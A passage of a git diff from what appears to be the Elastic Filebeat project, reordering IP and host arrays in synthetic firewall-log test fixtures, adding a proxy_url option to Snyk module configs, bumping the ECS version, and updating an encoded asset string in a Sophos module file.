"ita7851.localhost" ], "related.ip": [ - "10.198.202.72", - "10.78.180.219" + "10.78.180.219", + "10.198.202.72" ], "rsa.internal.messageid": "MALWARE", "rsa.misc.checksum": "equaturv", @@ -2637,8 +2637,8 @@ "onse3711.api.domain" ], "related.ip": [ - "10.95.152.78", - "10.4.147.70" + "10.4.147.70", + "10.95.152.78" ], "rsa.crypto.sig_type": "cid", "rsa.internal.messageid": "9193", @@ -2790,8 +2790,8 @@ "essequ121.localdomain" ], "related.ip": [ - "10.216.14.36", - "10.224.250.83" + "10.224.250.83", + "10.216.14.36" ], "rsa.internal.messageid": "MALWARE", "rsa.misc.checksum": "emi", @@ -2891,8 +2891,8 @@ "Bonoru5658.mail.invalid" ], "related.ip": [ - "10.46.57.181", - "10.29.231.11" + "10.29.231.11", + "10.46.57.181" ], "rsa.internal.messageid": "NGIPS_events", "rsa.internal.msg_id": "remape", @@ -3420,8 +3420,8 @@ "onofdeFi1149.www5.domain" ], "related.ip": [ - "10.154.87.98", - "10.186.68.87" + "10.186.68.87", + "10.154.87.98" ], "rsa.internal.messageid": "NGIPS_events", "rsa.internal.msg_id": "uptate", @@ -3477,8 +3477,8 @@ "lumdol5252.internal.test" ], "related.ip": [ - "10.35.59.140", - "10.67.211.63" + "10.67.211.63", + "10.35.59.140" ], "rsa.internal.messageid": "NGIPS_events", "rsa.internal.msg_id": "itess", @@ -3658,8 +3658,8 @@ "cididu3187.home" ], "related.ip": [ - "10.14.46.141", - "10.179.27.185" + "10.179.27.185", + "10.14.46.141" ], "rsa.internal.messageid": "MALWARE", "rsa.misc.checksum": "llumdolo", @@ -3841,10 +3841,10 @@ "erunt3957.internal.lan" ], "related.ip": [ - "10.118.103.185", "10.32.195.34", - "10.125.130.61", - "10.240.77.10" + "10.118.103.185", + "10.240.77.10", + "10.125.130.61" ], "rsa.internal.event_desc": "TCP Flow is no longer offloaded for connection", "rsa.internal.messageid": "FTD_events", @@ -3888,8 +3888,8 @@ "ntNe7144.api.lan" ], "related.ip": [ - "10.111.130.177", - "10.188.88.133" + "10.188.88.133", + "10.111.130.177" ], "rsa.internal.messageid": "MALWARE", "rsa.misc.checksum": "numqu", diff --git a/x-pack/filebeat/module/snyk/audit/config/config.yml b/x-pack/filebeat/module/snyk/audit/config/config.yml index 73cd5423a02..9f0ae0c0d22 100644 --- a/x-pack/filebeat/module/snyk/audit/config/config.yml +++ b/x-pack/filebeat/module/snyk/audit/config/config.yml @@ -13,6 +13,9 @@ request.url: https://snyk.io/api/v1/org/{{.audit_id}}/audit?page=1&sortOrder=ASC {{ end }} request.method: POST request.ssl: {{ .ssl | tojson }} +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} request.transforms: - set: target: header.Authorization @@ -73,4 +76,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/snyk/audit/manifest.yml b/x-pack/filebeat/module/snyk/audit/manifest.yml index eed5f4c29c9..b8858144bae 100644 --- a/x-pack/filebeat/module/snyk/audit/manifest.yml +++ b/x-pack/filebeat/module/snyk/audit/manifest.yml @@ -21,6 +21,7 @@ var: - name: event default: "" - name: ssl + - name: proxy_url ingest_pipeline: - ingest/pipeline.yml diff --git a/x-pack/filebeat/module/snyk/vulnerabilities/config/config.yml b/x-pack/filebeat/module/snyk/vulnerabilities/config/config.yml index ca371361192..79cd03ed1d4 100644 --- a/x-pack/filebeat/module/snyk/vulnerabilities/config/config.yml +++ b/x-pack/filebeat/module/snyk/vulnerabilities/config/config.yml @@ -7,6 +7,9 @@ interval: {{ .interval }} request.url: {{ .url }} request.method: POST request.ssl: {{ .ssl | tojson }} +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} request.transforms: - set: target: header.Authorization @@ -96,4 +99,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/snyk/vulnerabilities/manifest.yml b/x-pack/filebeat/module/snyk/vulnerabilities/manifest.yml index 391333380dc..771e52b972b 100644 --- a/x-pack/filebeat/module/snyk/vulnerabilities/manifest.yml +++ b/x-pack/filebeat/module/snyk/vulnerabilities/manifest.yml @@ -61,6 +61,7 @@ var: default: 0 - name: max_priority_score default: 1000 + - name: proxy_url ingest_pipeline: - ingest/pipeline.yml diff --git a/x-pack/filebeat/module/sonicwall/firewall/config/input.yml b/x-pack/filebeat/module/sonicwall/firewall/config/input.yml index 6c6188a7022..2b7d20e77f4 100644 --- a/x-pack/filebeat/module/sonicwall/firewall/config/input.yml +++ b/x-pack/filebeat/module/sonicwall/firewall/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/sonicwall/firewall/test/generated.log-expected.json b/x-pack/filebeat/module/sonicwall/firewall/test/generated.log-expected.json index 4bb6b904241..584160ea68b 100644 --- a/x-pack/filebeat/module/sonicwall/firewall/test/generated.log-expected.json +++ b/x-pack/filebeat/module/sonicwall/firewall/test/generated.log-expected.json @@ -20,8 +20,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.20.234.169", - "10.208.15.216" + "10.208.15.216", + "10.20.234.169" ], "rsa.db.index": "ciade", "rsa.internal.messageid": "1197", @@ -60,12 +60,12 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.hosts": [ - "oreetdol1714.internal.corp", - "nostrud4819.mail.test" + "nostrud4819.mail.test", + "oreetdol1714.internal.corp" ], "related.ip": [ - "10.49.111.67", - "10.92.136.230" + "10.92.136.230", + "10.49.111.67" ], "rsa.internal.messageid": "914", "rsa.internal.msg": "lupt", @@ -126,9 +126,9 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.150.156.22", + "10.227.15.1", "10.149.203.46", - "10.227.15.1" + "10.150.156.22" ], "rsa.internal.event_desc": "ctetur", "rsa.internal.messageid": "1369", @@ -553,8 +553,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.157.161.103", - "10.78.151.178" + "10.78.151.178", + "10.157.161.103" ], "rsa.internal.event_desc": "taut", "rsa.internal.messageid": "24", @@ -620,8 +620,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.239.201.234", - "10.204.11.20" + "10.204.11.20", + "10.239.201.234" ], "rsa.internal.messageid": "87", "rsa.internal.msg": "Loremip", @@ -660,9 +660,9 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.34.161.166", + "10.219.116.137", "10.245.200.97", - "10.219.116.137" + "10.34.161.166" ], "rsa.internal.event_desc": "rehend", "rsa.internal.messageid": "428", @@ -705,8 +705,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.252.122.195", - "10.118.80.140" + "10.118.80.140", + "10.252.122.195" ], "rsa.internal.messageid": "401", "rsa.internal.msg": "inesci", @@ -827,8 +827,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.30.153.159", - "10.86.101.235" + "10.86.101.235", + "10.30.153.159" ], "rsa.identity.user_sid_dst": "nse", "rsa.internal.event_desc": "veniamqu", @@ -909,8 +909,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.162.172.28", - "10.237.163.139" + "10.237.163.139", + "10.162.172.28" ], "rsa.internal.messageid": "255", "rsa.internal.msg": "nre", @@ -997,8 +997,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.16.72.220", - "10.111.187.12" + "10.111.187.12", + "10.16.72.220" ], "related.user": [ "tenbyCi" @@ -1118,8 +1118,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.hosts": [ - "Nemoenim2039.api.localhost", - "sequatu341.mail.invalid" + "sequatu341.mail.invalid", + "Nemoenim2039.api.localhost" ], "related.ip": [ "10.77.129.130", @@ -1289,8 +1289,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.192.27.157", - "10.230.173.4" + "10.230.173.4", + "10.192.27.157" ], "rsa.internal.messageid": "140", "rsa.misc.action": [ @@ -1425,8 +1425,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.29.155.171", - "10.15.97.155" + "10.15.97.155", + "10.29.155.171" ], "rsa.internal.messageid": "616", "rsa.misc.action": [ @@ -1527,8 +1527,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.25.32.107", - "10.18.204.87" + "10.18.204.87", + "10.25.32.107" ], "related.user": [ "cteturad" @@ -1571,9 +1571,9 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.21.89.175", + "10.246.0.167", "10.71.238.250", - "10.246.0.167" + "10.21.89.175" ], "rsa.internal.event_desc": "elitse", "rsa.internal.messageid": "428", @@ -1620,8 +1620,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.13.66.97", - "10.176.209.227" + "10.176.209.227", + "10.13.66.97" ], "rsa.identity.user_sid_dst": "mex", "rsa.internal.event_desc": "upt", @@ -1679,8 +1679,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.77.174.205", - "10.240.49.224" + "10.240.49.224", + "10.77.174.205" ], "rsa.internal.messageid": "240", "rsa.internal.msg": "issuscip", @@ -1711,8 +1711,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.44.150.31", - "10.187.210.173" + "10.187.210.173", + "10.44.150.31" ], "rsa.internal.messageid": "255", "rsa.internal.msg": "quamnih", @@ -1750,9 +1750,9 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.251.248.228", "10.108.84.24", - "10.113.100.237" + "10.113.100.237", + "10.251.248.228" ], "rsa.internal.event_desc": "volupt", "rsa.internal.messageid": "606", @@ -1861,8 +1861,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.105.46.101", - "10.50.44.5" + "10.50.44.5", + "10.105.46.101" ], "rsa.internal.messageid": "237", "rsa.misc.action": [ @@ -2048,8 +2048,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.102.166.19", - "10.104.49.142" + "10.104.49.142", + "10.102.166.19" ], "rsa.internal.messageid": "252", "rsa.internal.msg": "eprehend", @@ -2218,8 +2218,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.191.242.168", - "10.165.48.224" + "10.165.48.224", + "10.191.242.168" ], "rsa.internal.event_desc": "equep", "rsa.internal.messageid": "995", @@ -2304,8 +2304,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.219.42.212", - "10.57.85.98" + "10.57.85.98", + "10.219.42.212" ], "rsa.internal.event_desc": "mquisno", "rsa.internal.messageid": "995", @@ -2385,8 +2385,8 @@ "ugitsedq5067.internal.test" ], "related.ip": [ - "10.132.171.15", - "10.107.216.138" + "10.107.216.138", + "10.132.171.15" ], "rsa.internal.messageid": "537", "rsa.misc.action": [ @@ -2477,8 +2477,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.22.244.71", - "10.142.120.198" + "10.142.120.198", + "10.22.244.71" ], "related.user": [ "usmo" @@ -2598,8 +2598,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.56.10.84", - "10.12.54.142" + "10.12.54.142", + "10.56.10.84" ], "rsa.internal.messageid": "658", "rsa.internal.msg": "osquirat", @@ -2715,8 +2715,8 @@ "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "10.200.122.184", - "10.57.255.4" + "10.57.255.4", + "10.200.122.184" ], "rsa.identity.user_sid_dst": "sBon", "rsa.internal.event_desc": "fic", diff --git a/x-pack/filebeat/module/sophos/fields.go b/x-pack/filebeat/module/sophos/fields.go index b8320ff3f9b..7cd57e1bb32 100644 --- a/x-pack/filebeat/module/sophos/fields.go +++ b/x-pack/filebeat/module/sophos/fields.go @@ -19,5 +19,5 @@ func init() { // AssetSophos returns asset data. // This is the base64 encoded gzipped contents of module/sophos. func AssetSophos() string { - return "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